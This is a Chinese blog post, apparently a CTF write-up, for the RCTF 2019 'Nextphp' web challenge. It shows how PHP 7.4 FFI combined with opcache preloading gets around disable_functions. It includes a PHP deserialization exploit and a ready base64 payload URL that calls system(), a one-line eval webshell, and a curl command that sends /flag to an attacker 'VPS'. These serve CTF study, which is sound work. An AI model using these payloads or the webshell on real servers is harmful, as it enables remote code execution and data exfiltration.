[RCTF 2019]Nextphp&&php预加载实现FFI

最新推荐文章于 2024-04-16 20:35:04 发布
最新推荐文章于 2024-04-16 20:35:04 发布
阅读量409 收藏
点赞数
分类专栏: ctf web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jvkyvly/article/details/120249530
版权
ctf 同时被 2 个专栏收录
31 篇文章 1 订阅
订阅专栏
web
26 篇文章 0 订阅
订阅专栏

参考

<?php
if (isset($_GET['a'])) {
    eval($_GET['a']);
} else {
    show_source(__FILE__);
}

初看题目很简单,然后看了下phpinfo
过滤了挺多函数的,命令执行的都过滤了,然后还有open_basedir限制/var/www/html

然后可能会想一些绕过disable_function的姿势
1.LD_PRELOAD
mail,putenv,error_log全被禁了
2.Apache Mod CGI
没开

3.FFI

这里直接用ffi这个姿势不行,因为默认情况下,FFI API只能在CLI脚本和预加载的PHP文件中使用。

在本地环境 ffi.enable=preload模式下,web端也是无法执行 FFI 。将 ffi.enable 设置成 true后,发现 web 端就可以利用 FFI 了。

opcache.preload是PHP7.4中新加入的功能。此配置项定义的文件。会在服务器启动时将PHP脚本预加载。里面定义的类什么的。对所有请求都可用
在这里插入图片描述
这里。它就将preload.php预加载了。也解释了后面为啥index.php里可以调用preload.php的代码
在这里插入图片描述

然后做题,不管你是
file_put_contents('1.php','<?php eval($_POST["pass"]);?>');
上传木马,还是glob目录遍历发现了preload.php,然后去想,然后发现预加载了这个php,然后想方法构造ffi

在这里插入图片描述

<?php
$ffi=FFI::cdef("int system(char *command);");
$ffi->system("whoami");
?>

在A类中。只有run方法可以执行命令

   private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

如果将func变成ffi扩展。arg变成int system声明。那么this->data就成了一个带有system函数的FFI扩展。只要调用$this->data[‘ret’]->system(“whoami”)就行了

第一个调用点

__serialize()函数
return $this->data
会返回包含ret,func,arg的数组。那么我们可以通过($this->data)['ret']这种方法。取出其中ret值->system("whoami");

第二个调用点:
__get()函数
return $this->data[$key];
这就不必说了。。很明显
$this->data['ret']->system("whoami");
就可以了

然后写poc的时候还是有些地方点不太懂

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'FFI::cdef',
        'arg' => 'int system(char *command);'
    ];

    
    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

   
}

$a = new A();
echo base64_encode(serialize($a)); // 即payload

?a=unserialize(base64_decode(%27QzoxOiJBIjo4OTp7YTozOntzOjM6InJldCI7TjtzOjQ6ImZ1bmMiO3M6OToiRkZJOjpjZGVmIjtzOjM6ImFyZyI7czoyNjoiaW50IHN5c3RlbShjaGFyICpjb21tYW5kKTsiO319%27))->__get(%27ret%27)->system(%27cat%20/flag>1%27);

或者用curlcurl -d @/flag http://VPS麻烦点

访问1就好

异或1为啥要加这两个东西
在这里插入图片描述
在这里插入图片描述
其他师傅的话
这里的EXP代码中删除了原有的 __serialize 、 __unserialize 两个函数,这是因为在反序列化时会触发 __unserialize 函数,这一特性是在PHP7.4中新加入的,具体可参考https://wiki.php.net/rfc/custom_object_serialization

Je3Z
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[RCTF 2019]Nextphp
fmyyy1的博客
05-18 817
场景 源码就相当于一个一句话木马。肯定没这么简单,先看看phpinfo disable_functions里禁掉了不少函数 刚开始想的是用file_put_contents函数写shell再用蚁剑插件绕过disable_functions,但测试后不行,不过也得到了一些有用的信息。 有个preload.php <?php final class A implements Serializable { protected $data = [ 'ret' => null
RCTF2019-WEB-nextphp
river
05-31 1780
RCTF-web-nextphp <?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } http://192.168.1.8/?a=var_dump(scandir(getcwd())); http://192.168.1.8/?a=show_so...
有回显代码执行-无字母数字RCE进阶PHP5
最新发布
asdfaa的博客
04-16 792
可以执行,符合正则匹配,但无法获取flag值;
远程代码执行漏洞利用
Z_l123的博客
03-01 363
PHP下,允许命令执行的函数有 eval() assert() preg_replace() call_user_func() $a($b) eval() <?php if(isset($_GET['a'])){ eval($_GET['a']); } else{ echo "Please input a"; } ?> assert() <?php if(isset($_GET['a'])){ assert($_GET['a']); } else{ e
PHP代码注入详解
Zeker62的博客
08-16 4892
PHP代码注入的原理和解析 PHP代码注入靠的是RCE,即远程代码执行。 指应用程序过滤不严,hacker可以将代码注入到服务器进行远程的执行。 危害和SSRF相似,通过这个漏洞可以操控服务器的动作。 最典型的就是一句话木马。 PHP代码漏洞注入的两个要素: 程序中含有可执行的PHP代码函数 传入第一点的参数,客户端可控,直接修改或者影响 下面将对PHP相关函数和语句以及注入方法进行解释 eval() eval()函数在很多语言中都有,比如Python、PHP。 eval函数的作用是将字符串作为PHP
PHP7.4 FFI 扩展安全问题
weixin_63231007的博客
02-22 1259
PHP 7.4 FFI扩展 bypass disable_function&[RCTF] nextphp&geek2020 FighterFightsInvincibly
php-fuse:libfusePHP FFI绑定
05-16
PHP保险丝 PHP FFI绑定。 您可以使用PHP编写自己的文件系统。安装composer require sj-i/php-fuse要求PHP 7.4+(NTS / ZTS) 64位Linux x86_64 FFI扩展libfuse(当前基于2.9.9)文献资料当前,没有提供文档。 :-( ...
awesome-php-ffiPHP FFI示例和用例
01-29
很棒PHP FFI 这是一个存储库,显示了一些用例。 此存储库中的示例: 有关PHP FFI的其他存储库:
Rust FFI C/C++ & Rust 互操作
06-22
这是2020左右在学习Rust FFI时写的一个学习随笔, 扔了怪可惜, 放出来也许有点用。 c/c++ and rust 互调。
php-rdkafka-ffi:PHP Kafka客户端-通过FFI绑定librdkafka
05-27
zend opcache扩展用于加载 pcntl扩展,可在请求/响应上下文中更快地关闭 注意:目前正在试验对macOS和Windows的支持。 安装 composer require idealo/php-rdkafka-ffi 注意:期所有0. *发行版本都有重大更改...
php通过ffi获取系统信息等demo .zip
01-17
软件开发设计:应用软件开发、系统软件开发、移动应用开发、网站开发Node.js、C++、Java、python、web、C#等语言的项目开发与学习资料 硬件与设备:单片机、EDA、proteus、RTOS、包括计算机硬件、服务器、网络设备、...
[SCUCTF]2021 校赛 Web题目复现
cosmoslin的博客
04-08 1926
web 1 入门 查看headers 2 shell <?php if(isset($_GET['eval'])){ $eval = $_GET['eval']; if(!preg_match('/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\{|\}|\&|\-/i', $c)){ eval("$eval"); }else{ die("hacker??"); } }else{ highlight_file(__FILE__); } ?
[RCTF 2019]Nextphpphp7.4的FFI扩展安全问题)
m0_62422842的博客
12-14 637
这个FFI扩展最初是为了能够更方便的调用C语言的各种库而设计的,然而在不正确的使用下就会像该题这样,直接绕过php层的限制去执行命令。当然,个人觉得该扩展引发的安全问题也是比较好防护的。设置ffi.enable=preload参数选项,指定特定的php文件去调用FFI。总之,FFI扩展引发的问题也是需要了解的。
php危险函数总结
我是齐潇啊
03-28 5456
php危险函数笔记总结以及实操结果
命令执行漏洞
weixin_59872639的博客
03-01 4535
基本定义 命令执行漏洞是指攻击者可以随意执行系统命分为远程命令执行(远程代码执行)和系统命令执行两类。 原理 程序应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命 令拼接到正常命令中,从而造成命令执行攻击。 两个条件 用户能够控制的函数输入 存在可以执行代码或者系统命令的危险函数 命令执行漏洞产生的原因 由于开发人员编写源码时,没有针对代码
[wp] RCTF2019-nextphp
MercyLin的博客
09-11 1760
<?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } 尝试利用eval ?a=echo system("ls"); system()函数被禁止了. 尝试查看phpinfo(); ?a=phpinfo(); 查看成功,在页面查找disable_function...
php FFI的使用方法
04-27
2. 使用FFI加载C语言库,可以使用以下代码: ```php $ffi = FFI::cdef("int printf(const char *format, ...);", "libc.so.6"); ``` 该代码中,第一个参数是C语言函数的声明,第二个参数是C语言库的名称。 3. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值